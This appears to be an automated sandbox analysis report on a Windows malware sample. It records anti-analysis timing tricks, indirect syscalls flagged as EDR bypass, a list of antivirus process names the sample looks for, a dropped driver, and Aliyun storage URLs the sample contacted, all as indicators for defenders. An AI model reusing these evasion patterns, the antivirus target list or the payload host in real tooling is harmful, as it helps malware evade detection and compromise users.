Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeRDTSC instruction interceptor: First address: 1400010C8 second address: 1400010DF instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeRDTSC instruction interceptor: First address: 1400010DF second address: 1400010DF instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007F904516E930h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeWindow / User API: threadDelayed 548Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeWindow / User API: threadDelayed 451Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\O8xg2t.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_6-14031
Source: C:\Users\user\Documents\O8xg2t.exeAPI coverage: 2.7 %
Source: C:\Users\user\Documents\O8xg2t.exeAPI coverage: 2.7 %
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe TID: 7672Thread sleep count: 548 > 30Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe TID: 7672Thread sleep time: -274000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe TID: 7672Thread sleep count: 451 > 30Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exe TID: 7672Thread sleep time: -225500s >= -30000sJump to behavior
Source: C:\Users\user\Documents\O8xg2t.exeLast function: Thread delayed
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_00007FFBC320A1B8 FindFirstFileExW,6_2_00007FFBC320A1B8
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_00007FFBC1BAA1B8 FindFirstFileExW,9_2_00007FFBC1BAA1B8
Source: 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004EC000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004EA000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318798939.00000000004E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Documents\O8xg2t.exeAPI call chain: ExitProcess graph end nodegraph_6-14032
Source: C:\Users\user\Documents\O8xg2t.exeAPI call chain: ExitProcess graph end nodegraph_6-14374
Source: C:\Users\user\Documents\O8xg2t.exeAPI call chain: ExitProcess graph end nodegraph_9-14440
Source: C:\Users\user\Documents\O8xg2t.exeAPI call chain: ExitProcess graph end nodegraph_9-14096
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_00000001400073E0 LdrLoadDll,6_2_00000001400073E0
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0000000140007C91
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_000000014000F000
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_0000000140004630 GetProcessHeap,HeapReAlloc,GetProcessHeap,HeapAlloc,6_2_0000000140004630
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0000000140007C91
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000001400106B0
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_00000001400092E0 SetUnhandledExceptionFilter,6_2_00000001400092E0
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_00007FFBC32076E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FFBC32076E0
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_00007FFBC3201F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FFBC3201F50
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_00007FFBC3202630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FFBC3202630
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_0000000140007C91 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_0000000140007C91
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_00000001400106B0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00000001400106B0
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_00000001400092E0 SetUnhandledExceptionFilter,9_2_00000001400092E0
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_00007FFBC1BA2630 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00007FFBC1BA2630
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_00007FFBC1BA1F50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00007FFBC1BA1F50
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_00007FFBC1BA76E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00007FFBC1BA76E0

HIPS / PFW / Operating System Protection Evasion

barindex
Found direct / indirect Syscall (likely to bypass EDR)
Source: C:\Users\user\Documents\O8xg2t.exeNtProtectVirtualMemory: Indirect: 0x2B4B253Jump to behavior
Source: C:\Users\user\Documents\O8xg2t.exeNtAllocateVirtualMemory: Indirect: 0x140006FD0Jump to behavior
Source: C:\Users\user\Documents\O8xg2t.exeNtProtectVirtualMemory: Indirect: 0x2A1B253Jump to behavior
Source: C:\Users\user\Desktop\287438657364-7643738421.08.exeNtDelayExecution: Indirect: 0x1D94D5Jump to behavior
Source: C:\Users\user\Documents\O8xg2t.exeNtProtectVirtualMemory: Indirect: 0x299B253Jump to behavior
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_00007FFBC320FD40 cpuid 6_2_00007FFBC320FD40
Source: C:\Users\user\Documents\O8xg2t.exeCode function: GetLocaleInfoA,6_2_000000014000F370
Source: C:\Users\user\Documents\O8xg2t.exeCode function: GetLocaleInfoA,9_2_000000014000F370
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_000000014000A370 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_000000014000A370
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_0000000140005A70 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,6_2_0000000140005A70
Source: O8xg2t.exe, 00000006.00000002.2420405559.0000000002768000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000007.00000002.2430399393.00000000027E8000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000009.00000002.2640861186.0000000002918000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
Source: O8xg2t.exe, 00000006.00000002.2420405559.0000000002768000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000007.00000002.2430399393.00000000027E8000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000009.00000002.2640861186.0000000002918000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: vsserv.exe
Source: O8xg2t.exe, 00000006.00000002.2420405559.0000000002768000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000007.00000002.2430399393.00000000027E8000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000009.00000002.2640861186.0000000002918000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
Source: O8xg2t.exe, 00000006.00000002.2420405559.0000000002768000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000007.00000002.2430399393.00000000027E8000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000009.00000002.2640861186.0000000002918000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
Source: O8xg2t.exe, 00000006.00000002.2420405559.0000000002768000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000007.00000002.2430399393.00000000027E8000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000009.00000002.2640861186.0000000002918000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
Source: O8xg2t.exe, 00000006.00000002.2420405559.0000000002768000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000007.00000002.2430399393.00000000027E8000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000009.00000002.2640861186.0000000002918000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360Safe.exe
Source: O8xg2t.exe, 00000006.00000002.2420405559.0000000002768000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000007.00000002.2430399393.00000000027E8000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000009.00000002.2640861186.0000000002918000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
Source: O8xg2t.exe, 00000006.00000002.2420405559.0000000002768000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000007.00000002.2430399393.00000000027E8000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000009.00000002.2640861186.0000000002918000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
Source: O8xg2t.exe, 00000006.00000002.2420405559.0000000002768000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000007.00000002.2430399393.00000000027E8000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000009.00000002.2640861186.0000000002918000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
Source: O8xg2t.exe, 00000006.00000002.2420405559.0000000002768000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000007.00000002.2430399393.00000000027E8000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000009.00000002.2640861186.0000000002918000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
Source: O8xg2t.exe, 00000006.00000002.2420405559.0000000002768000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000007.00000002.2430399393.00000000027E8000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000009.00000002.2640861186.0000000002918000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: avgwdsvc.exe
Source: O8xg2t.exe, 00000006.00000002.2420405559.0000000002768000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000007.00000002.2430399393.00000000027E8000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000009.00000002.2640861186.0000000002918000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
Source: O8xg2t.exe, 00000006.00000002.2420405559.0000000002768000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000007.00000002.2430399393.00000000027E8000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000009.00000002.2640861186.0000000002918000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
Source: O8xg2t.exe, 00000006.00000002.2420405559.0000000002768000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000007.00000002.2430399393.00000000027E8000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000009.00000002.2640861186.0000000002918000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
Source: O8xg2t.exe, 00000006.00000002.2420405559.0000000002768000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000007.00000002.2430399393.00000000027E8000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000009.00000002.2640861186.0000000002918000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
Source: O8xg2t.exe, 00000006.00000002.2420405559.0000000002768000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000007.00000002.2430399393.00000000027E8000.00000002.00001000.00020000.00000000.sdmp, O8xg2t.exe, 00000009.00000002.2640861186.0000000002918000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,6_2_00000001400042B0
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 6_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,6_2_0000000140003F80
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,9_2_00000001400042B0
Source: C:\Users\user\Documents\O8xg2t.exeCode function: 9_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,9_2_0000000140003F80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
Service Execution		24
Windows Service		1
Access Token Manipulation		31
Masquerading		1
Credential API Hooking		1
System Time Discovery		Remote Services1
Credential API Hooking		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Native API		1
DLL Side-Loading		24
Windows Service		1
Virtualization/Sandbox Evasion		LSASS Memory131
Security Software Discovery		Remote Desktop Protocol1
Archive Collected Data		1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Process Injection		1
Access Token Manipulation		Security Account Manager1
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
Abuse Elevation Control Mechanism		1
Process Injection		NTDS1
Process Discovery		Distributed Component Object ModelInput Capture3
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Abuse Elevation Control Mechanism		Cached Domain Credentials1
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
Obfuscated Files or Information		DCSync123
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
287438657364-7643738421.08.exe11%VirustotalBrowse
287438657364-7643738421.08.exe8%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\Documents\O8xg2t.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://jylhok.oss-cn-beijing.aliyuncs.com/c.gif60%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/q0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/b.gif0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/i.dat0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/s.jpg0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/i.datta0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifk0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/Zm0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/w0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/s.dat0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifW0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/Vm0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/a.gif0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/d.gifta0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifents0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/a.giff0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifhttps://jylhok.oss-cn-beijing.aliyuncs.com/b.gifhttp0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/7-2476756634-10030%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/d.gifws0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/d.gif0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/C0%Avira URL Cloudsafe
https://jylhok.oss-cn-beijing.aliyuncs.com/c.gif0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
sc-2a1c.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com
39.103.20.48
truefalse
    		unknown
    jylhok.oss-cn-beijing.aliyuncs.com
    		unknown
    		unknownfalse
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://jylhok.oss-cn-beijing.aliyuncs.com/s.datfalse
      • Avira URL Cloud: safe
      		unknown
      https://jylhok.oss-cn-beijing.aliyuncs.com/i.datfalse
      • Avira URL Cloud: safe
      		unknown
      https://jylhok.oss-cn-beijing.aliyuncs.com/s.jpgfalse
      • Avira URL Cloud: safe
      		unknown
      https://jylhok.oss-cn-beijing.aliyuncs.com/b.giffalse
      • Avira URL Cloud: safe
      		unknown
      https://jylhok.oss-cn-beijing.aliyuncs.com/a.giffalse
      • Avira URL Cloud: safe
      		unknown
      https://jylhok.oss-cn-beijing.aliyuncs.com/d.giffalse
      • Avira URL Cloud: safe
      		unknown
      https://jylhok.oss-cn-beijing.aliyuncs.com/c.giffalse
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://jylhok.oss-cn-beijing.aliyuncs.com/c.gif6287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://jylhok.oss-cn-beijing.aliyuncs.com/q287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004E0000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://jylhok.oss-cn-beijing.aliyuncs.com/i.datta287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004D2000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      https://jylhok.oss-cn-beijing.aliyuncs.com/b.gifk287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://ocsp.thawte.com0287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, O8xg2t.exe.0.drfalse
        		high
        https://jylhok.oss-cn-beijing.aliyuncs.com/Zm287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://jylhok.oss-cn-beijing.aliyuncs.com/w287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004E0000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://jylhok.oss-cn-beijing.aliyuncs.com/Vm287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://jylhok.oss-cn-beijing.aliyuncs.com/a.gifW287438657364-7643738421.08.exe, 00000000.00000003.2259204008.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318710257.0000000000525000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000525000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://jylhok.oss-cn-beijing.aliyuncs.com/287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004D2000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004E0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000525000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        https://jylhok.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/287438657364-7643738421.08.exe, 00000000.00000003.2318710257.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000500000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004FA000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.symauth.com/cps0(287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, O8xg2t.exe.0.drfalse
          		high
          https://jylhok.oss-cn-beijing.aliyuncs.com/d.gifta287438657364-7643738421.08.exe, 00000000.00000003.2318798939.00000000004D0000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://jylhok.oss-cn-beijing.aliyuncs.com/7-2476756634-1003287438657364-7643738421.08.exe, 00000000.00000003.2318710257.00000000004F6000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2260272882.0000000000500000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004FA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://jylhok.oss-cn-beijing.aliyuncs.com/a.giff287438657364-7643738421.08.exe, 00000000.00000003.2278187746.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2318798939.00000000004D0000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2259204008.00000000004D2000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://crl.thawte.com/ThawteTimestampingCA.crl0287438657364-7643738421.08.exe, 00000000.00000003.2278120650.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279104627.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278414521.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278348554.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2279016189.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 287438657364-7643738421.08.exe, 00000000.00000003.2278322116.00000000049E3000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, O8xg2t.exe.0.drfalse
            		high
